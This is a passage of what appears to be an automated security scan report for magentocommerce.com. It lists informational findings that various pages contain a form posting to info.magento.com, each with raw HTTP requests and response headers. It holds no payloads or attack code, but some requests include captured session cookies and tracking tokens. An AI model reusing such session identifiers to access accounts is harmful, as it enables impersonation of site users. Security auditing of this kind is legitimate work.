Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175780; expires=Sat, 11-Aug-2012 15:03:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fservices%2Fcontact-us-popup%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:00 GMT
Content-Length: 3090

<div class="contact-popup-top">
<div class="top-l-corner"></div>
<div class="top-r-corner"></div>
</div>
<a class="popup-close" onclick="contactBox.close();" href="#"><img src="http://www.mage
...[SNIP]...
<div class="contact-popup">
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1026" name="mktForm_1026">
<p>
...[SNIP]...
6.137. http://www.magentocommerce.com/services/course-pricing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/course-pricing

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /services/course-pricing HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175747; expires=Sat, 11-Aug-2012 15:02:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fservices%2Fcourse-pricing%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:27 GMT
Content-Length: 35078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.138. http://www.magentocommerce.com/services/course-schedule  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/course-schedule

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /services/course-schedule HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175751; expires=Sat, 11-Aug-2012 15:02:31 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fservices%2Fcourse-schedule%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:31 GMT
Content-Length: 49762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.139. http://www.magentocommerce.com/services/descriptions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/descriptions

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /services/descriptions HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/training
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170926; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.6.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171049; expires=Sat, 11-Aug-2012 13:44:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:09 GMT
Content-Length: 57276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.140. http://www.magentocommerce.com/services/professional-services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/professional-services

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /services/professional-services HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175764; expires=Sat, 11-Aug-2012 15:02:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fservices%2Fprofessional-services%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:45 GMT
Content-Length: 35091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.141. http://www.magentocommerce.com/services/register-for-training  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/register-for-training

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /services/register-for-training HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175732; expires=Sat, 11-Aug-2012 15:02:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fservices%2Fregister-for-training%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:13 GMT
Content-Length: 41049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.142. http://www.magentocommerce.com/services/testimonials  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/testimonials

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /services/testimonials HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175741; expires=Sat, 11-Aug-2012 15:02:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Ftestimonials%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:21 GMT
Content-Length: 36222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.143. http://www.magentocommerce.com/services/training  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/training

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /services/training HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/screencasts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170923; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.5.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171066; expires=Sat, 11-Aug-2012 13:44:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:26 GMT
Content-Length: 37516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.144. http://www.magentocommerce.com/showcase  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /showcase

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /showcase HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176322; expires=Sat, 11-Aug-2012 15:12:02 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fshowcase%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:02 GMT
Content-Length: 50996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.145. http://www.magentocommerce.com/sitemap/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /sitemap/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /sitemap/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176452; expires=Sat, 11-Aug-2012 15:14:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fsitemap%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:12 GMT
Content-Length: 55319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.146. http://www.magentocommerce.com/support/magento-user-guide-book  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/magento-user-guide-book

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /support/magento-user-guide-book HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176223; expires=Sat, 11-Aug-2012 15:10:23 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fsupport%2Fmagento-user-guide-book%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:23 GMT
Content-Length: 39756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.147. http://www.magentocommerce.com/support/magento_core_api  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/magento_core_api

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /support/magento_core_api HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176236; expires=Sat, 11-Aug-2012 15:10:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fsupport%2Fmagento_core_api%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:36 GMT
Content-Length: 34959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.148. http://www.magentocommerce.com/support/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/overview

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /support/overview HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176215; expires=Sat, 11-Aug-2012 15:10:15 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fsupport%2Foverview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:16 GMT
Content-Length: 37099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.149. http://www.magentocommerce.com/svn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /svn

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /svn HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176280; expires=Sat, 11-Aug-2012 15:11:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A5%3A%22%2Fsvn%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
